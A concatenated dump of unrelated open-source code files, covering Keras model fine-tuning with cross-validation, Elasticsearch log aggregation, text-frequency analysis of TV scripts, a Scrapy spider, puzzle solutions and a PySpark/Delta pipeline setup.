Modelo----------------------------\n\n\ndef create_new_model():\n # Carrega os pesos do modelo para uma variável auxiliar\n load_aux = tf.keras.models.load_model(model_path)\n # Instancia um modelo com os pesos da auxiliar e camada de saída indicada\n load_model = Model(inputs=load_aux.inputs, outputs=load_aux.outputs)\n # Cria o modelo base, pré-treinado da imagenet\n base_model = Xception(weights='imagenet', include_top=False,\n input_shape=(299, 299, 3), pooling='avg')\n # Descongelando o modelo base\n base_model.trainable = True\n # Congela as camadas da Xception que não o último bloco convolucional\n for layer in range(len(base_model.layers)-8):\n base_model.layers[layer].trainable = False\n # Busca o input do modelo base\n x = base_model(base_model.input)\n # Adiciona o classificador treinado ao modelo\n outputs = load_model.get_layer('dense')(x)\n model = Model(inputs=base_model.input, outputs=outputs)\n #model.summary()\n return model\n\n# ------------------------Preparação dos K-Folds-------------------------\n\n\n# Leitura dos dados de treino de um CSV com os caminhos\ntrain_data = pd.read_csv('training_labels.csv')\ntest_data = pd.read_csv('testing_labels.csv')\n# Pega as classes do CSV\nY = train_data[['label']]\n\n# Instancio um \"Stratified\" K-Fold, que garante sempre o mesmo percentual de amostras de cada classe\n# Número de folds: 4, shuffle as imagens de ordem com seed 7\nskf = StratifiedKFold(n_splits=4, random_state=7, shuffle=True)\n\n# --------------------------Data Augmentation----------------------------\n\n# Instancio um Gerador que gera lotes de dados de imagem de tensor com data augmentation em tempo real\n# Faixa de graus para rotações aleatórias: 20º; às vezes, vira a imagem horizontalmente; também\n# pré-processa a imagem de acordo com os resquisitos da Xception\nidg = ImageDataGenerator(rotation_range=20,\n horizontal_flip=True,\n fill_mode='nearest',\n preprocessing_function=preprocess_input)\n\n# --------------------------Cross Validation-----------------------------\n\n# Função auxiliar que retorna o nome do modelo de acordo com seu fold\n\n\ndef get_model_name(k):\n return 'model_'+str(k)+'.h5'\n\n\n# Métricas de desempenho dos K folds\nVALIDATION_ACCURACY = []\nVALIDATION_LOSS = []\nfold_var = 1 # Contador do fold\n\n# As variáveis train_index e val_index são matrizes com os índices\n# que a função cross_validation.StratifiedKFold montou\nfor train_index, val_index in skf.split(np.zeros(len(Y)), Y):\n # Criar modelos em um loop faz com que o estado global consuma uma quantidade cada\n # vez maior de memória ao longo do tempo. Chamar esse método libera o estado global.\n tf.keras.backend.clear_session()\n #print(\"Loop \",fold_var)\n\n # Função do pandas que aloca os dados presentes no index de treino\n training_data = train_data.iloc[train_index]\n # Função do pandas que aloca os dados presentes no index de validação\n validation_data = train_data.iloc[val_index]\n\n # Pega os dados que foram indicados a serem utilizados nesse fold\n # do diretório das imagens. Nome dos arquivos estão na coluna filename\n # enquanto aqueles da classe vão para a coluna \"label\". A previsão retornará\n # rótulos 2D codificados, graças ao \"categorical\". 
Ele tira as fotos de ordem.\n train_data_generator = idg.flow_from_dataframe(dataframe=training_data,\n directory=train_image_dir,\n x_col=\"filename\",\n y_col=\"label\",\n batch_size=23,\n seed=42,\n class_mode=\"categorical\",\n shuffle=True)\n valid_data_generator = idg.flow_from_dataframe(dataframe=validation_data,\n directory=train_image_dir,\n x_col=\"filename\",\n y_col=\"label\",\n batch_size=32,\n seed=42,\n class_mode=\"categorical\",\n shuffle=True)\n test_generator = idg.flow_from_dataframe(dataframe=test_data,\n directory=test_image_dir,\n x_col=\"filename\",\n y_col=\"label\",\n batch_size=11,\n seed=42,\n class_mode=\"categorical\",\n shuffle=True)\n\n # ---------------------------Fine Tuning-----------------------------\n\n # Criação de um novo modelo com a função create_new_model definida\n model = create_new_model()\n\n # Compilação do novo modelo, com o otimizador RMSprop\n opt = tf.keras.optimizers.RMSprop(learning_rate=0.0005)\n model.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=[tf.keras.metrics.Accuracy(),\n tf.keras.metrics.CategoricalAccuracy(),\n tf.keras.metrics.AUC(),\n tf.keras.metrics.Precision(),\n tf.keras.metrics.Recall(),\n tf.keras.metrics.FalsePositives(),\n tf.keras.metrics.FalseNegatives()])\n\n # Criação dos callbacks\n # Faz com que o TensorBoard tenha acesso aos dados de treinamento para visualização\n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = TensorBoard(log_dir=log_dir, histogram_freq=0)\n # Cria a lista de callbacks com o TensorBoard\n callbacks_list = [tensorboard_callback]\n\n # Mostra a situação da GPU\n #monitor = Monitor(30)\n \n ''' Experimento de treino com pesos abandonado.\n # Pesos de classes\n weight_dict = {0:24.20, # Endocapillary\n 1:12.17, # Endomesangial\n 2:4.78, # Membranous\n 3:9.15, # Mesangial\n 4:3.11, # Normal\n 5:4.78} # Sclerosis\n '''\n # Treinamento da nova rede neural\n history = model.fit(x=train_data_generator,\n batch_size=32,\n steps_per_epoch=train_data_generator.n//train_data_generator.batch_size,\n epochs=num_epochs,\n callbacks=callbacks_list,\n #class_weight=weight_dict, # Experimento de treino com pesos abandonado.\n validation_data=valid_data_generator,\n validation_steps=valid_data_generator.n//valid_data_generator.batch_size)\n #print(\"Acabou o treinamento.\")\n # Desaloca o Monitor\n # monitor.stop()\n # Salva o modelo para que tenha-se acesso posteriormente\n file_path = get_model_name(fold_var)\n model.save(file_path)\n \n # -----------------------Avaliação do Modelo-------------------------\n \n # Calcula os passos para o experimento de teste\n test_spe = np.math.ceil(test_generator.samples/test_generator.batch_size)\n # Avalia o modelo nos exemplos de teste\n results = model.evaluate(x=test_generator,\n steps=test_spe,\n callbacks=callbacks_list)\n # Guarda os resultados\n results = dict(zip(model.metrics_names, results))\n # Coloca os resultados no histórico\n VALIDATION_ACCURACY.append(results['accuracy'])\n VALIDATION_LOSS.append(results['loss'])\n\n fold_var += 1\n\nwith open('K-Fold_performance.txt', 'w') as f:\n for acc in VALIDATION_ACCURACY:\n f.write(\"Accuracy: %s\\n\" % acc)\n for loss in VALIDATION_LOSS:\n f.write(\"Loss: %s\\n\" % 
loss)\nf.close()","repo_name":"ozenilsoncruz/ic-ozenilson-2021","sub_path":"ic-ellen/PathoSpotter-Search-dev/cross_val-fine_tuning.py","file_name":"cross_val-fine_tuning.py","file_ext":"py","file_size_in_byte":10336,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19953461290","text":"import sys\r\nimport json\r\nimport yaml\r\nimport datetime\r\nimport time\r\nimport requests\r\nimport elasticsearch\r\nimport regex\r\nimport threading\r\n\r\nimport logging\r\nimport logging.config\r\n\r\nfrom pprint import pprint\r\n\r\n\r\n###\r\nlog_config = {\r\n    'disable_existing_loggers': True,\r\n    'version': 1,\r\n    'formatters': {\r\n        'short': {\r\n            'format': '%(asctime)s %(levelname)s %(name)s: %(message)s'\r\n        },\r\n    },\r\n    'handlers': {\r\n        'console': {\r\n            'level': 'INFO',\r\n            'formatter': 'short',\r\n            'class': 'logging.StreamHandler',\r\n        },\r\n    },\r\n    'loggers': {\r\n        '': {\r\n            'handlers': ['console'],\r\n            'level': 'INFO',\r\n        }\r\n    }\r\n}\r\n\r\nlogging.config.dictConfig(log_config)\r\n\r\n\r\n# Elasticsearch Shard stats index creation:\r\n\"\"\"\r\nPUT test_status_count_summary\r\n{\r\n  \"mappings\": {\r\n    \"doc\": {\r\n      \"dynamic\": \"false\",\r\n      \"properties\": {\r\n        \"status\": {\"type\": \"keyword\" },\r\n        \"@timestamp\": {\"type\": \"date\" },\r\n        \"interval\": {\"type\": \"keyword\" },\r\n        \"doc_count\": {\"type\": \"long\" },\r\n        \"doc_count_total\": {\"type\": \"long\" },\r\n        \"beat.name\": {\"type\": \"keyword\" },\r\n        \"pipeline.kafka_topic_id\": {\"type\": \"keyword\" },\r\n        \"pipeline.egress.hostname\": {\"type\": \"keyword\" },\r\n        \"pipeline.ingress.hostname\": {\"type\": \"keyword\" },\r\n        \"fields.team\": {\"type\": \"keyword\" }\r\n      }\r\n    }\r\n  }\r\n}\r\n\"\"\"\r\n\r\nindex_mappings = {\r\n    \"mappings\": {\r\n        \"doc\": {\r\n            \"dynamic\": \"false\",\r\n            \"properties\": {\r\n                \"status\": {\"type\": \"keyword\" },\r\n                \"@timestamp\": {\"type\": \"date\" },\r\n                \"interval\": {\"type\": \"keyword\" },\r\n                \"doc_count\": {\"type\": \"long\" },\r\n                \"doc_count_total\": {\"type\": \"long\" },\r\n            }\r\n        }\r\n    }\r\n}\r\n\r\nagg_keys = [\r\n    'beat.name', 'pipeline.kafka_topic_id',\r\n    'pipeline.egress.hostname', 'pipeline.ingress.hostname',\r\n    'fields.team']\r\n\r\ninterval_names = {\r\n    '1m': 60,\r\n    '5m': (60 * 5),\r\n    '15m': (60 * 15),\r\n    '1h': (60 * 60),\r\n    '24h': (60 * 60 * 24),\r\n    '1d': (60 * 60 * 24)\r\n}\r\n\r\n# The reindexing is intended to produce a list of documents primarily\r\n# indexed by status, and then secondarily by the various sub-buckets\r\n# ?should this def be called reindex or flatten?\r\ndef reindex_aggregation(agg_response):\r\n\r\n    logger = logging.getLogger(__name__)\r\n    if (agg_response['timed_out']):\r\n        logger.error(\"Timeout found in aggregation response\")\r\n        return None\r\n\r\n    try:\r\n        status_buckets = agg_response['aggregations']['status']['buckets']\r\n    except KeyError as e:\r\n        logger.error(\"response format unexpected\")\r\n        return None\r\n\r\n    # Start extracting from the nested aggs and start flattening\r\n    reindexed_docs = []\r\n    for s_bucket in status_buckets:\r\n        try:\r\n            reindexed_docs.append({\r\n                'status': s_bucket['key'],\r\n                '@timestamp': agg_response['interval_timestamp'],\r\n                'doc_count_total': s_bucket['doc_count'],\r\n                'interval': agg_response['interval']\r\n            })\r\n        except KeyError as e:\r\n            logger.error(\"required fields missing in response %s\" % repr(e))\r\n            return None\r\n\r\n        for agg_key in agg_keys:\r\n            if (agg_key in s_bucket):\r\n                subagg_buckets = s_bucket[agg_key]['buckets']\r\n                for _sab in subagg_buckets:\r\n                    reindexed_docs.append({\r\n                        'status': s_bucket['key'],\r\n                        '@timestamp': agg_response['interval_timestamp'],\r\n                        'interval': agg_response['interval'],\r\n                        agg_key: _sab['key'],\r\n                        'doc_count': _sab['doc_count']\r\n                    })\r\n\r\n    return(reindexed_docs)\r\n\r\n\r\ndef gen_subagg_query(primary, secondaries):\r\n\r\n    q_template = {\r\n        \"query\": {\r\n            \"range\": {\r\n                \"@timestamp\": {\r\n                    # default five minutes\r\n                    \"gte\": int((time.time() - 300) * 1000),\r\n                    \"lte\": int(time.time() * 1000),\r\n                    \"format\": \"epoch_millis\"\r\n                }\r\n            }\r\n        },\r\n        \"aggs\": {\r\n            (\"%s\" % primary): {\r\n                \"terms\": {\r\n                    \"field\": primary\r\n                }\r\n            }\r\n        },\r\n        \"size\": 0\r\n    }\r\n\r\n    # setup the secondary aggregations\r\n    q_template['aggs'][primary]['aggs'] = {}\r\n    for _agg in secondaries:\r\n        q_template['aggs'][primary]['aggs'][_agg] = {\r\n            \"terms\": { \"field\": _agg }\r\n        }\r\n\r\n    return (q_template)\r\n\r\n\r\ndef main():\r\n\r\n    logger = logging.getLogger(__name__)\r\n    es_cred = None\r\n    try:\r\n        with open('auth.yml') as f:\r\n            es_cred = yaml.safe_load(f)['creds']\r\n    except Exception as e:\r\n        # log error\r\n        raise e\r\n\r\n    with open('clusters.yml') as f:\r\n        clusters = yaml.safe_load(f)\r\n\r\n    logging.info(\"contacting cluster...\")\r\n    test_es = elasticsearch.Elasticsearch(\r\n        hosts=[{'host': 'localhost', 'port': '9200'}],\r\n        sniff_on_start=False,\r\n        sniff_on_connection_fail=False,\r\n        http_auth=(es_cred['user'], es_cred['pass']))\r\n\r\n\r\n\r\n    interval_duration = '15m'\r\n    # timestamps are still in seconds at this point...\r\n    _set_ts = int(time.time())\r\n    interval_end = _set_ts - (_set_ts % interval_names[interval_duration])\r\n    interval_start = interval_end - interval_names[interval_duration]\r\n    # convert to milliseconds\r\n    interval_end = interval_end * 1000\r\n    interval_start = interval_start * 1000\r\n    interval_delta = interval_names[interval_duration] * 1000\r\n\r\n    run_thirty_days = int(60/15) * 24 * 30\r\n\r\n    # generate the aggregation query\r\n    agg_query_json = gen_subagg_query('status', agg_keys)\r\n    for i in range(run_thirty_days):\r\n        interval_end = interval_end - interval_delta\r\n        interval_start = interval_start - interval_delta\r\n\r\n        agg_query_json['query']['range']['@timestamp']['gte'] = interval_start\r\n        agg_query_json['query']['range']['@timestamp']['lte'] = interval_end\r\n\r\n        # submit the query and add the timestamp info to the response\r\n        logger.debug(\"submitting query: %s\" %\r\n            json.dumps(agg_query_json, indent=4))\r\n        try:\r\n            ridx_aggs = test_es.search(index='filebeat-*', body=agg_query_json)\r\n        except (elasticsearch.ConnectionError, elasticsearch.ConnectionTimeout) as e:\r\n            logger.error(\"could not complete query %s\", repr(e))\r\n            continue\r\n\r\n        ridx_aggs['interval'] = interval_duration\r\n        ridx_aggs['interval_timestamp'] = interval_end\r\n\r\n        doc_list = reindex_aggregation(ridx_aggs)\r\n        if doc_list is None:\r\n            # reindex_aggregation returns None on malformed responses\r\n            continue\r\n\r\n        for doc in doc_list:\r\n            try:\r\n                test_es.index(\r\n                    index='test_status_count_summary',\r\n                    doc_type='doc',\r\n                    body=json.dumps(doc))\r\n            except (elasticsearch.ConnectionError, elasticsearch.ConnectionTimeout) as e:\r\n                logger.error(\"could not complete query %s\", repr(e))\r\n                continue\r\n\r\n        print(\"ran iteration %d\" % i)\r\n\r\n    sys.exit(0)\r\n\r\nif __name__ == '__main__':\r\n    
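To make the flattening contract of `reindex_aggregation` concrete, here is a toy, hand-built response shaped like what `gen_subagg_query` produces once `main` has attached the `interval` and `interval_timestamp` fields. The values are invented, and the sketch assumes `reindex_aggregation` and `agg_keys` from this module are in scope:

```python
sample_response = {
    "timed_out": False,
    "interval": "15m",
    "interval_timestamp": 1700000000000,
    "aggregations": {
        "status": {
            "buckets": [
                {
                    "key": "200",
                    "doc_count": 42,
                    # one secondary terms aggregation, keyed like agg_keys
                    "beat.name": {
                        "buckets": [{"key": "web-01", "doc_count": 30}]
                    },
                }
            ]
        }
    },
}

docs = reindex_aggregation(sample_response)
# One summary doc per status bucket, plus one doc per sub-bucket
assert docs[0]["doc_count_total"] == 42
assert docs[1]["beat.name"] == "web-01" and docs[1]["doc_count"] == 30
```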
main()\r\n","repo_name":"rickgarcia/elastic-monitoring","sub_path":"status_count.py","file_name":"status_count.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19106003765","text":"from indexing_matrix import indexing_matrix\nfrom indexing_dictionary import indexing_dictionary\nfrom preprocessing import preprocessing\nimport os\nimport numpy as np\nfrom nltk.corpus import stopwords\n\n\ndef main():\n stop_words = stopwords.words('russian')\n names = ('моника', 'мон', 'рэйчел', 'рейч', 'чендлер', 'чэндлер', 'чен',\n 'фиби', 'фибс', 'росс', 'джоуи', 'джои',\n 'джо') # a tuple, so the names do not fall victim to overzealous lemmatization\n curr_dir = os.getcwd()\n filepath = os.path.join(curr_dir, 'friends-data/')\n dirfiles = os.listdir(filepath) # build the path to our data\n\n texts = [] # the list of texts we will iterate over\n for season in dirfiles:\n season_path = os.path.join(filepath, f'{season}/')\n for script in os.listdir(season_path):\n with open(os.path.join(filepath, f'{season}/{script}'), 'r', encoding='utf-8') as file:\n texts.append(preprocessing(file.read(), stop_words, names)) # process each episode separately, then\n # append the processed text to the list\n\n our_matrix = indexing_matrix(texts) # the matrix\n our_dictionary = indexing_dictionary(texts) # the dictionary\n\n with open('matrix_data.txt', 'w', encoding='utf-8') as file:\n max_freq = 0\n for line in np.transpose(our_matrix[0].toarray()): # transpose the matrix and find the highest word frequency,\n # summed over all documents\n max_freq = max(max_freq, sum(line))\n max_freq_words = set()\n for index, line in enumerate(np.transpose(our_matrix[0].toarray())): # walk the matrix again and collect the words\n # whose frequency equals the maximum\n if sum(line) == max_freq:\n max_freq_words.add(our_matrix[1][index])\n file.write(f'The most frequent word is {max_freq_words}. It occurs {max_freq} times.\\n\\n')\n\n min_freq = float('inf') # start above any real count so the true minimum is found\n for line in np.transpose(our_matrix[0].toarray()): # do the same as above, but now for the\n # minimum frequency\n min_freq = min(min_freq, sum(line))\n min_freq_words = set()\n for index, line in enumerate(np.transpose(our_matrix[0].toarray())):\n if sum(line) == min_freq:\n min_freq_words.add(our_matrix[1][index])\n file.write(f'The rarest words: {\", \".join(min_freq_words)}. 
Each of them occurs {min_freq} times.\\n\\n')\n\n words_everywhere = set() # the set of words that occur in every document\n for index, line in enumerate(np.transpose(our_matrix[0].toarray())): # in the transposed matrix, look for rows\n # where the word occurs at least once in every document, then add those words to the set\n line_set = set(line)\n if 0 not in line_set:\n words_everywhere.add(our_matrix[1][index])\n file.write(f'Words that appear in all documents: {\", \".join(words_everywhere)}.\\n\\n')\n\n pre_names_freq = {} # a dict of all the names\n for index, line in enumerate(\n np.transpose(our_matrix[0].toarray())): # transpose the matrix and collect every name and its frequency\n if our_matrix[1][index] in names:\n pre_names_freq[our_matrix[1][index]] = sum(line)\n names_freq = {\n 'моника': pre_names_freq['моника'] + pre_names_freq['мон'],\n 'рэйчел': pre_names_freq['рэйчел'] + pre_names_freq['рейч'],\n 'чендлер': pre_names_freq['чендлер'] + pre_names_freq['чэндлер'] + pre_names_freq['чен'],\n 'фиби': pre_names_freq['фиби'] + pre_names_freq['фибс'],\n 'росс': pre_names_freq['росс'],\n 'джоуи': pre_names_freq['джоуи'] + pre_names_freq['джои'] + pre_names_freq['джо']\n } # merge the name variants to get complete, linked data (a very clumsy way to do it, but I could not\n # come up with anything better; if you dislike it too, please tell me how it can be done better)\n file.write(\n f'The most popular character is {max(names_freq, key=names_freq.get)}, appearing {names_freq[max(names_freq, key=names_freq.get)]} times.\\n\\n')\n\n with open('dictionary_data.txt', 'w', encoding='utf-8') as file:\n max_freq = 0\n for elem in our_dictionary: # find the highest word frequency in the dictionary\n max_freq = max(sum(our_dictionary[elem].values()), max_freq)\n max_freq_words = set()\n for elem in our_dictionary: # collect the word(s) with the highest frequency\n if sum(our_dictionary[elem].values()) == max_freq:\n max_freq_words.add(elem)\n file.write(f'The most frequent word is {max_freq_words}. It occurs {max_freq} times.\\n\\n')\n\n min_freq = float('inf')\n for elem in our_dictionary: # find the lowest word frequency in the dictionary\n min_freq = min(sum(our_dictionary[elem].values()), min_freq)\n min_freq_words = set()\n for elem in our_dictionary: # collect the word(s) with the lowest frequency\n if sum(our_dictionary[elem].values()) == min_freq:\n min_freq_words.add(elem)\n file.write(f'The rarest words: {\", \".join(min_freq_words)}. 
Each of them occurs {min_freq} times.\\n\\n')\n\n words_everywhere = set()\n for elem in our_dictionary: # look for dictionary keys whose value is a dict of length 165 (165 is the total number of documents)\n if len(our_dictionary[elem]) == 165:\n words_everywhere.add(elem)\n file.write(f'Words that appear in all documents: {\", \".join(words_everywhere)}.\\n\\n')\n\n pre_names_freq = {}\n for elem in our_dictionary: # collect the names and their frequencies from the dictionary\n if elem in names:\n for text in our_dictionary[elem]:\n pre_names_freq[elem] = our_dictionary[elem][text] + pre_names_freq.get(elem, 0)\n names_freq = {\n 'моника': pre_names_freq['моника'] + pre_names_freq['мон'],\n 'рэйчел': pre_names_freq['рэйчел'] + pre_names_freq['рейч'],\n 'чендлер': pre_names_freq['чендлер'] + pre_names_freq['чэндлер'] + pre_names_freq['чен'],\n 'фиби': pre_names_freq['фиби'] + pre_names_freq['фибс'],\n 'росс': pre_names_freq['росс'],\n 'джоуи': pre_names_freq['джоуи'] + pre_names_freq['джои'] + pre_names_freq['джо']\n } # merge the name variants to get complete, linked data\n file.write(\n f'The most popular character is {max(names_freq, key=names_freq.get)}, appearing {names_freq[max(names_freq, key=names_freq.get)]} times.\\n\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"IgorDyatlov/infosearch22","sub_path":"infosearch_dz_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2413988862","text":"import scrapy\r\nfrom ..items import ImagesScraperItem\r\nimport csv\r\n\r\n\r\nclass ImagesFamousBirthdaysSpider(scrapy.Spider):\r\n name = 'url'\r\n URLs_list = []\r\n final_urls = []\r\n start_urls = []\r\n with open(\"F:/CODE/Ezra's Script/URLs.csv\", 'r')as f:\r\n data = csv.reader(f)\r\n for row in data:\r\n for link in row:\r\n start_urls.append(link)\r\n start_urls.pop(0)\r\n print(len(start_urls))\r\n\r\n def parse(self, response):\r\n items = ImagesScraperItem()\r\n urls = response.css('a.face::attr(href)').extract()\r\n\r\n for href in urls:\r\n ImagesFamousBirthdaysSpider.URLs_list.append(href)\r\n\r\n url_set = (ImagesFamousBirthdaysSpider.URLs_list)\r\n for link in url_set:\r\n if \"https://www.\" in link:\r\n ImagesFamousBirthdaysSpider.final_urls.append(link)\r\n else:\r\n pass\r\n\r\n for url in ImagesFamousBirthdaysSpider.final_urls:\r\n items['Urls'] = url\r\n\r\n yield items\r\n","repo_name":"KaleemArshad/Scraping-Downloading-Bulk-Images","sub_path":"Code/Images_Scraper/Images_Scraper/spiders/Url_Scraper.py","file_name":"Url_Scraper.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31598143178","text":"from collections import deque\n\ndef evaluate(d, part=\"a\"):\n op = \"*\"\n val = None\n prev = 1\n while d:\n tok = d.popleft()\n if tok == \"(\":\n val = evaluate(d, part=part)\n elif tok.isdigit():\n val = int(tok)\n elif tok in \"+*\":\n op = tok\n elif tok == \")\":\n\n return prev\n if val is not None:\n\n if op == \"+\":\n prev += val\n elif op == \"*\":\n if part == \"b\":\n while d and d[0] == \"+\":\n d.popleft()\n r = d.popleft()\n if r.isdigit():\n val += int(r)\n elif r == \"(\":\n val += evaluate(d, part=part)\n prev *= val\n val = None\n\n return prev\n\nlines = open(f\"day18/test.txt\", \"r\").read().replace(\" \", \"\").splitlines()\nprint(\"part a:\", sum([evaluate(deque(line), part=\"a\") for line 
in lines]))\nprint(\"part b:\", sum([evaluate(deque(line), part=\"b\") for line in lines]))\n\n\n\"\"\"\nPart 1: 26335\nPart 2: 693891\n\n5 + (8 * 3 + 9 + 3 * 4 * 3)\n5 * 9 * (7 * 3 * 3 + 9 * 3 + (8 + 6 * 4))\n((2 + 4 * 9) * (6 + 9 * 8 + 6) + 6) + 2 + 4 * 2\n\"\"\"","repo_name":"jamescalnan/AdventOfCode","sub_path":"advent-of-code-2020/day18/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11735540","text":"#!/usr/bin/env python\r\n\r\nfrom collections import defaultdict\r\n\r\nimport re\r\nimport sys\r\n\r\nprojects = defaultdict(list)\r\nepilogue = []\r\n\r\ninput_data = sys.stdin.readlines()\r\nfor line in input_data:\r\n m = re.match('(\\d+)>', line)\r\n if m:\r\n projects[m.group(1)].append(line)\r\n else:\r\n epilogue.append(line)\r\n\r\ntry:\r\n eol = re.search('\\s+$', input_data[0]).group()\r\nexcept:\r\n eol = '\\n'\r\n\r\nfor num in sorted(projects.keys(), key=int):\r\n sys.stdout.write(''.join(projects[num])+eol)\r\nsys.stdout.write(''.join(epilogue))\r\n","repo_name":"tgandor/meats","sub_path":"log_analysis/msvc_sort.py","file_name":"msvc_sort.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"38715011692","text":"\"\"\"\nProblem:\n\nAll the disks start off on the first rod in a stack. They are ordered by size, with the\nlargest disk on the bottom and the smallest one at the top.\n\nThe goal of this puzzle is to move all the disks from the first rod to the last rod\nwhile following these rules:\n\nYou can only move one disk at a time.\nA move consists of taking the uppermost disk from one of the stacks and placing it on\ntop of another stack.\nYou cannot place a larger disk on top of a smaller disk.\nWrite a function that prints out all the steps necessary to complete the Tower of Hanoi.\nYou should assume that the rods are numbered, with the first rod being 1, the second\n(auxiliary) rod being 2, and the last (goal) rod being 3.\n\nFor example, with n = 3, we can do this in 7 moves:\n\nMove 1 to 3\nMove 1 to 2\nMove 3 to 2\nMove 1 to 3\nMove 2 to 1\nMove 2 to 3\nMove 1 to 3\n\"\"\"\n\nfrom typing import Optional\n\n\ndef towers_of_hanoi(\n n: int,\n start_rod: Optional[str] = None,\n aux_rod: Optional[str] = None,\n end_rod: Optional[str] = None,\n) -> None:\n # initializing the names for the rods [using different convention from the one\n # mentioned in the question]\n if not start_rod:\n start_rod = \"start_rod\"\n print(\n f\"\\nTower of Hanoi for {n} Disks ========================================\"\n )\n if not aux_rod:\n aux_rod = \"aux_rod\"\n if not end_rod:\n end_rod = \"end_rod\"\n # if the number of disks left to move is 1, its shifted [base case for recursion]\n if n == 1:\n print(f\"Move disk 1 from {start_rod} to {end_rod}\")\n return\n\n # moving the top disk of the start rod to the proper position in the auxilary rod\n # using the end rod as buffer\n towers_of_hanoi(n - 1, start_rod, end_rod, aux_rod)\n # moving the top disk from the start rod to the end rod\n print(f\"Move disk {n} from {start_rod} to {end_rod}\")\n # moving the top disk of the auxilary rod to the proper position in the end rod\n # using the start rod as buffer\n towers_of_hanoi(n - 1, aux_rod, start_rod, end_rod)\n\n\nif __name__ == \"__main__\":\n towers_of_hanoi(3)\n towers_of_hanoi(4)\n towers_of_hanoi(5)\n towers_of_hanoi(6)\n\n\n\"\"\"\nSPECS:\n\nTIME 
COMPLEXITY: O(2 ^ n)\nSPACE COMPLEXITY: O(n)\n\"\"\"\n","repo_name":"ruppysuppy/Daily-Coding-Problem-Solutions","sub_path":"Solutions/128.py","file_name":"128.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":444,"dataset":"github-code","pt":"67"} +{"seq_id":"31676987013","text":"import random\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s-%(name)s-%(levelname)s-%(message)s')\n\ndef hello():\n print('hello!')\n\ndef hi(name):\n print(f'hi!{name}!')\n\ndef getAnswer(number):\n if number:\n return f'The number is {number}!'\n\ndef big_or_small():\n print('Please enter a number:')\n number = input()\n r = random.randint(1, 100)\n answer = getAnswer(r)\n if int(number) < int(r):\n logging.debug(number)\n logging.debug(answer)\n print('Too small')\n \n\nif __name__ == '__main__':\n hello()\n hello()\n hi('yy')\n hi('hbpu')\n big_or_small()\n\n","repo_name":"hbpu/autoPython","sub_path":"function/3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33093699718","text":"import json\nimport os \nfrom pyspark import SparkConf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\nfrom sys import argv\nimport shutil\nfrom delta import *\nimport pyspark\nfrom delta.tables import *\nimport argparse\nimport time\nimport tempfile\nimport uuid\nimport logging\nimport cddp.ingestion as cddp_ingestion\n\n# silence informational messages from py4j\nlogging.getLogger('py4j').setLevel(logging.ERROR)\n\n\nstorage_format = \"delta\"\n\ndef create_spark_session():\n \"\"\"Creates a Spark Session\"\"\"\n builder = pyspark.sql.SparkSession.builder.appName(\"MyApp\") \\\n .config(\"spark.sql.extensions\", \"io.delta.sql.DeltaSparkSessionExtension\") \\\n .config(\"spark.sql.catalog.spark_catalog\", \"org.apache.spark.sql.delta.catalog.DeltaCatalog\")\n spark = configure_spark_with_delta_pip(builder).getOrCreate()\n return spark\n\ndef init(spark, config, working_dir):\n \"\"\"Sets up the working directory and the stage paths for the app\"\"\"\n current_dir_path = os.path.dirname(os.path.realpath(__file__))\n if working_dir is None:\n working_dir = current_dir_path\n config['working_dir'] = working_dir\n\n app_name = config['name']\n config['app_data_path'] = f\"{config['working_dir']}/{app_name}/\"\n config['staging_path'] = f\"{config['working_dir']}/{app_name}/staging\"\n config['standard_path'] = f\"{config['working_dir']}/{app_name}/standard\"\n config['serving_path'] = f\"{config['working_dir']}/{app_name}/serving\"\n \n\n print(f\"\"\"app name: {config[\"name\"]},\n landing path: {config['landing_path']},\n staging path: {config['staging_path']},\n standard path: {config['standard_path']},\n serving path: {config['serving_path']},\n working dir:{config['working_dir']},\n \"\"\")\n\n\n\ndef init_database(spark, config):\n app_name = config['name']\n spark.sql(f\"CREATE SCHEMA IF NOT EXISTS {app_name}\")\n spark.sql(f\"USE SCHEMA {app_name}\")\n\ndef clean_database(spark, config):\n app_name = config['name']\n current_dir_path = os.path.dirname(os.path.realpath(__file__))\n database_path = f\"{current_dir_path}/spark-warehouse/{app_name}.db/\"\n if os.path.exists(config['app_data_path']):\n shutil.rmtree(config['app_data_path'])\n if os.path.exists(database_path):\n shutil.rmtree(database_path)\n\n spark.sql(f\"DROP SCHEMA IF EXISTS {app_name} CASCADE \")\n\n\ndef load_config(config_path):\n \"\"\"Loads the configuration 
